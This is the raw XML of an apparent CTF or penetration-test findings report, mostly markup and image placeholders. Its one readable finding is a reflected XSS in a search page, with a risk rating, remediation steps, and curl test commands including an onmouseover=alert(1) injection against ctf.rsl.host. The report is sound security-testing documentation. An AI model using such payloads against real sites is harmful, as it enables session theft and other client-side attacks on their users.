    <w:p w14:paraId="39205496" w14:textId="2D8FA069" w:rsidR="008A6460" w:rsidRDefault="00772DB2" w:rsidP="00772DB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B702876" wp14:editId="3F92B633">
            <wp:extent cx="5943600" cy="1950720"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="87630"/>
            <wp:docPr id="7147839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AB136E" w14:textId="3DFDB834" w:rsidR="0017797C" w:rsidRDefault="0017797C" w:rsidP="0017797C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FE83E7B" wp14:editId="0A9EBD7D">
            <wp:extent cx="5600700" cy="4213860"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="91440"/>
            <wp:docPr id="18711541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213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EFF684" w14:textId="4A69C845" w:rsidR="00A66461" w:rsidRDefault="00A66461" w:rsidP="0017797C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37F5AEBE" wp14:editId="75EEDA67">
            <wp:extent cx="5715000" cy="1737360"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="91440"/>
            <wp:docPr id="3500173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737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68E5ED" w14:textId="75CD658B" w:rsidR="000E61BD" w:rsidRDefault="000E61BD" w:rsidP="0017797C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F0BE4BE" wp14:editId="5DB19C54">
            <wp:extent cx="5715000" cy="1922780"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="96520"/>
            <wp:docPr id="14922974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922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5779B3" w14:textId="7A71CE81" w:rsidR="00F22E13" w:rsidRDefault="00F22E13" w:rsidP="0017797C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1414953E" wp14:editId="373F47D3">
            <wp:extent cx="5715000" cy="3335020"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="93980"/>
            <wp:docPr id="17443260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3350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DB6F64" w14:textId="77777777" w:rsidR="0017797C" w:rsidRDefault="0017797C" w:rsidP="00772DB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F0210D" w14:textId="77777777" w:rsidR="00241B32" w:rsidRDefault="00241B32" w:rsidP="00772DB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F7128D8" w14:textId="77777777" w:rsidR="00241B32" w:rsidRDefault="00241B32" w:rsidP="00241B32"/>
    <w:p w14:paraId="04307D20" w14:textId="77777777" w:rsidR="00241B32" w:rsidRDefault="00241B32" w:rsidP="00241B32"/>
    <w:p w14:paraId="6092F6C8" w14:textId="77777777" w:rsidR="00241B32" w:rsidRDefault="00241B32" w:rsidP="00241B32"/>
    <w:p w14:paraId="3592BF01" w14:textId="77777777" w:rsidR="00241B32" w:rsidRDefault="00241B32" w:rsidP="00241B32"/>
    <w:p w14:paraId="41C424A9" w14:textId="77777777" w:rsidR="00241B32" w:rsidRPr="008C2BC7" w:rsidRDefault="00241B32" w:rsidP="00241B32"/>
    <w:p w14:paraId="1433AE8D" w14:textId="5215268D" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="000E2136" w:rsidRPr="000E2136">
        <w:t>Reflected XSS in Search Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBC09A7" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Risk Rating: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="00544AAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00544AAC">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB0882" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Exploitation Likelihood: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="00544AAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00544AAC">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75124FF2" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Potential Impact: [Critical / </w:t>
      </w:r>
      <w:r w:rsidRPr="00544AAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="00544AAC">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A91E642" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3B48D2" w14:textId="226C8F5E" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="00BD5A9B" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5A9B">
        <w:t xml:space="preserve">The search functionality reflects user input directly into HTML attributes without proper encoding. The search term is placed in both the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50CBC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5A9B">
        <w:t xml:space="preserve"> attribute of a div element and in the page content, allowing injection of malicious JavaScript through event handlers. Attackers can craft malicious URLs that execute JavaScript when victims click on them, leading to session theft, credential harvesting, or other client-side attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6567C5" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C612D76" w14:textId="77777777" w:rsidR="00F11C50" w:rsidRDefault="00F11C50" w:rsidP="00F11C50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement proper output encoding for all user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4719DB56" w14:textId="77777777" w:rsidR="00F11C50" w:rsidRDefault="00F11C50" w:rsidP="00F11C50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use context-aware encoding (HTML entity encoding for HTML context)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600596B" w14:textId="77777777" w:rsidR="00F11C50" w:rsidRDefault="00F11C50" w:rsidP="00F11C50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Validate and sanitize input parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16733C49" w14:textId="77777777" w:rsidR="00F11C50" w:rsidRDefault="00F11C50" w:rsidP="00F11C50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Implement Content Security Policy to prevent inline script execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304AD559" w14:textId="5DDC6AE6" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="00F11C50" w:rsidP="00F11C50">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use secure templating engines that auto-escape output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E77692" w14:textId="77777777" w:rsidR="008A6460" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Testing Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351C27A9" w14:textId="77777777" w:rsidR="003076F4" w:rsidRDefault="003076F4" w:rsidP="003076F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tested normal search: </w:t>
      </w:r>
      <w:r w:rsidRPr="003076F4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl "https://ctf.rsl.host/search?search_term=test"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142A4DE5" w14:textId="77777777" w:rsidR="003076F4" w:rsidRDefault="003076F4" w:rsidP="003076F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identified reflection in HTML: </w:t>
      </w:r>
      <w:r w:rsidRPr="003076F4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;div id="test"&gt;&lt;p&gt;Results for: test&lt;/p&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FB1951" w14:textId="77777777" w:rsidR="003076F4" w:rsidRDefault="003076F4" w:rsidP="003076F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Injected event handler: </w:t>
      </w:r>
      <w:r w:rsidRPr="003076F4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl "https://ctf.rsl.host/search?search_term=test%22%20onmouseover%3D%22alert(1)%22"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D070B11" w14:textId="77777777" w:rsidR="003076F4" w:rsidRDefault="003076F4" w:rsidP="003076F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Confirmed XSS execution in browser when hovering over results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45541C9A" w14:textId="3C93F8A0" w:rsidR="003076F4" w:rsidRDefault="003076F4" w:rsidP="003076F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tested multiple event handlers (onclick, </w:t>
      </w:r>
      <w:r w:rsidR="00360F6D">
        <w:t>onmouseover</w:t>
      </w:r>
      <w:r>
        <w:t>) with successful injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244863AF" w14:textId="759C865D" w:rsidR="00B06E6A" w:rsidRDefault="00E42687" w:rsidP="009E4E21">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59ADB299" wp14:editId="09EC2738">
            <wp:extent cx="5943600" cy="1530985"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="88265"/>
            <wp:docPr id="1754396844"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6844" name="Picture 1" descr="A computer code on a black background&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="15309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2F751" w14:textId="3005EC44" w:rsidR="00290EF5" w:rsidRDefault="00536375" w:rsidP="00ED2597">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24DE4035" wp14:editId="481A4003">
            <wp:extent cx="5715000" cy="2038350"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="95250"/>
            <wp:docPr id="9048468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038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70C2A0" w14:textId="26F73F48" w:rsidR="00EC0199" w:rsidRPr="008C2BC7" w:rsidRDefault="00EC0199" w:rsidP="00D62A78">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="791C91B7" wp14:editId="7D0ED137">
            <wp:extent cx="5715000" cy="1846580"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="96520"/>
            <wp:docPr id="14176227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8465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sectPr w:rsidR="00EC0199" w:rsidRPr="008C2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42419C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E6AEC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C097BFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DBE2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A42742"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F15862B4"/>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9263277">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="868950159">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="983853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8B"/>
    <w:rsid w:val="0002432E"/>
    <w:rsid w:val="00051F9D"/>
    <w:rsid w:val="000840A2"/>
    <w:rsid w:val="000C575B"/>
    <w:rsid w:val="000D71D9"/>
    <w:rsid w:val="000E2136"/>
    <w:rsid w:val="000E4F6C"/>
    <w:rsid w:val="000E61BD"/>
    <w:rsid w:val="000F36E0"/>
    <w:rsid w:val="000F563E"/>
    <w:rsid w:val="00101F68"/>
    <w:rsid w:val="00127EA0"/>
    <w:rsid w:val="00165618"/>
    <w:rsid w:val="0017797C"/>
    <w:rsid w:val="001938DE"/>
    <w:rsid w:val="00195D61"/>
    <w:rsid w:val="001A18D0"/>
    <w:rsid w:val="001A63EB"/>
    <w:rsid w:val="001F2E97"/>
    <w:rsid w:val="002118D8"/>
    <w:rsid w:val="002159E9"/>
    <w:rsid w:val="00241B32"/>
    <w:rsid w:val="002449F6"/>
    <w:rsid w:val="00244A1D"/>
    <w:rsid w:val="00260E32"/>
    <w:rsid w:val="0027152C"/>
    <w:rsid w:val="00290EF5"/>
    <w:rsid w:val="002B01C6"/>
    <w:rsid w:val="002B658F"/>
    <w:rsid w:val="002E7780"/>
    <w:rsid w:val="003076F4"/>
    <w:rsid w:val="0035287F"/>
    <w:rsid w:val="00360F6D"/>
    <w:rsid w:val="003740FD"/>
    <w:rsid w:val="003B5BED"/>
    <w:rsid w:val="003E1766"/>
    <w:rsid w:val="00400650"/>
    <w:rsid w:val="00406C7E"/>
    <w:rsid w:val="004079D6"/>
    <w:rsid w:val="00426D2A"/>
    <w:rsid w:val="00427D0A"/>
    <w:rsid w:val="004527E4"/>
    <w:rsid w:val="00457DEA"/>
    <w:rsid w:val="00466334"/>
    <w:rsid w:val="004703B1"/>
    <w:rsid w:val="00494B69"/>
    <w:rsid w:val="004C5FD0"/>
    <w:rsid w:val="004F7B47"/>
    <w:rsid w:val="00536375"/>
    <w:rsid w:val="00544AAC"/>
    <w:rsid w:val="005543F1"/>
    <w:rsid w:val="005959F5"/>
    <w:rsid w:val="005B1525"/>
    <w:rsid w:val="005B2896"/>
    <w:rsid w:val="005C4AF8"/>
    <w:rsid w:val="005D2E0A"/>
    <w:rsid w:val="00614762"/>
    <w:rsid w:val="00617F48"/>
    <w:rsid w:val="00617FCA"/>
    <w:rsid w:val="00627948"/>
    <w:rsid w:val="00635B4C"/>
    <w:rsid w:val="00643941"/>
    <w:rsid w:val="00663DEB"/>
    <w:rsid w:val="006761FC"/>
    <w:rsid w:val="006865C4"/>
    <w:rsid w:val="006A10DB"/>
    <w:rsid w:val="006B765D"/>
    <w:rsid w:val="006C63F7"/>
    <w:rsid w:val="006E0044"/>
    <w:rsid w:val="006F24F8"/>
    <w:rsid w:val="00721C43"/>
    <w:rsid w:val="00732F1D"/>
    <w:rsid w:val="0073326C"/>
    <w:rsid w:val="00736B4F"/>
    <w:rsid w:val="007641F6"/>
    <w:rsid w:val="00772DB2"/>
    <w:rsid w:val="007A69C8"/>
    <w:rsid w:val="007C6A51"/>
    <w:rsid w:val="007E1455"/>
    <w:rsid w:val="007E2908"/>
    <w:rsid w:val="0080305F"/>
    <w:rsid w:val="00820BE6"/>
    <w:rsid w:val="00855C92"/>
    <w:rsid w:val="00874632"/>
    <w:rsid w:val="00892E9D"/>
    <w:rsid w:val="008A6460"/>
    <w:rsid w:val="008A6F48"/>
    <w:rsid w:val="008B5551"/>
    <w:rsid w:val="008C244A"/>
    <w:rsid w:val="008C2BC7"/>
    <w:rsid w:val="008E6312"/>
    <w:rsid w:val="009154BF"/>
    <w:rsid w:val="00921F19"/>
    <w:rsid w:val="00937E2A"/>
    <w:rsid w:val="00990D5B"/>
    <w:rsid w:val="009927D0"/>
    <w:rsid w:val="0099625A"/>
    <w:rsid w:val="00996320"/>
    <w:rsid w:val="00997F33"/>
    <w:rsid w:val="009E4E21"/>
    <w:rsid w:val="009F0403"/>
    <w:rsid w:val="00A04EEE"/>
    <w:rsid w:val="00A43840"/>
    <w:rsid w:val="00A45A93"/>
    <w:rsid w:val="00A66461"/>
    <w:rsid w:val="00B02932"/>
    <w:rsid w:val="00B06E6A"/>
    <w:rsid w:val="00B10521"/>
    <w:rsid w:val="00B15ED9"/>
    <w:rsid w:val="00B27214"/>
    <w:rsid w:val="00B753E7"/>
    <w:rsid w:val="00B7643B"/>
    <w:rsid w:val="00B91403"/>
    <w:rsid w:val="00BA50AC"/>
    <w:rsid w:val="00BC688B"/>
    <w:rsid w:val="00BD5A9B"/>
    <w:rsid w:val="00BE7B5A"/>
    <w:rsid w:val="00C27D27"/>
    <w:rsid w:val="00CB7E48"/>
    <w:rsid w:val="00CD3167"/>
    <w:rsid w:val="00CD6035"/>
    <w:rsid w:val="00CE4B9B"/>
    <w:rsid w:val="00CF5EE0"/>
    <w:rsid w:val="00D37E19"/>
    <w:rsid w:val="00D430DF"/>
    <w:rsid w:val="00D45D9C"/>
    <w:rsid w:val="00D57011"/>
    <w:rsid w:val="00D62A78"/>
    <w:rsid w:val="00D63AA9"/>
    <w:rsid w:val="00DA277A"/>
    <w:rsid w:val="00DB3DFB"/>
    <w:rsid w:val="00DF00BC"/>
    <w:rsid w:val="00E1068B"/>
    <w:rsid w:val="00E121FB"/>
    <w:rsid w:val="00E42687"/>
    <w:rsid w:val="00E50383"/>
    <w:rsid w:val="00E8649F"/>
    <w:rsid w:val="00EA03F7"/>
    <w:rsid w:val="00EA2593"/>
    <w:rsid w:val="00EA4A3C"/>
    <w:rsid w:val="00EA76A9"/>
    <w:rsid w:val="00EC0199"/>
    <w:rsid w:val="00EC5267"/>
    <w:rsid w:val="00ED2597"/>
    <w:rsid w:val="00EE1243"/>
    <w:rsid w:val="00F11C50"/>
    <w:rsid w:val="00F127AD"/>
    <w:rsid w:val="00F22E13"/>
    <w:rsid w:val="00F35DFE"/>
    <w:rsid w:val="00F466A3"/>
    <w:rsid w:val="00F50CBC"/>
    <w:rsid w:val="00F84E3D"/>
    <w:rsid w:val="00FA4097"/>
    <w:rsid w:val="00FB2188"/>
    <w:rsid w:val="00FB51A3"/>
    <w:rsid w:val="00FE160C"/>
    <w:rsid w:val="00FE414F"/>
    <w:rsid w:val="00FF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F1641"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{63B8190D-C23A-418D-9279-B033E4B6C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6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06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06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06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06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06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06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06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06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6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06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06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06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06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06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06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06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068B"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00E106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06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06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06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068B"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00E1068B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E1068B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00E1068B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00E106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068B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00E1068B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007E1455"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007E14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3367698">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1194729819">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1271933036">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="157046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gif"/><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gif"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.gi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24</Pages>
  <Words>1660</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Babcock</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Josh Babcock</cp:lastModifiedBy>
  <cp:revision>167</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-04T01:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-04T03:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>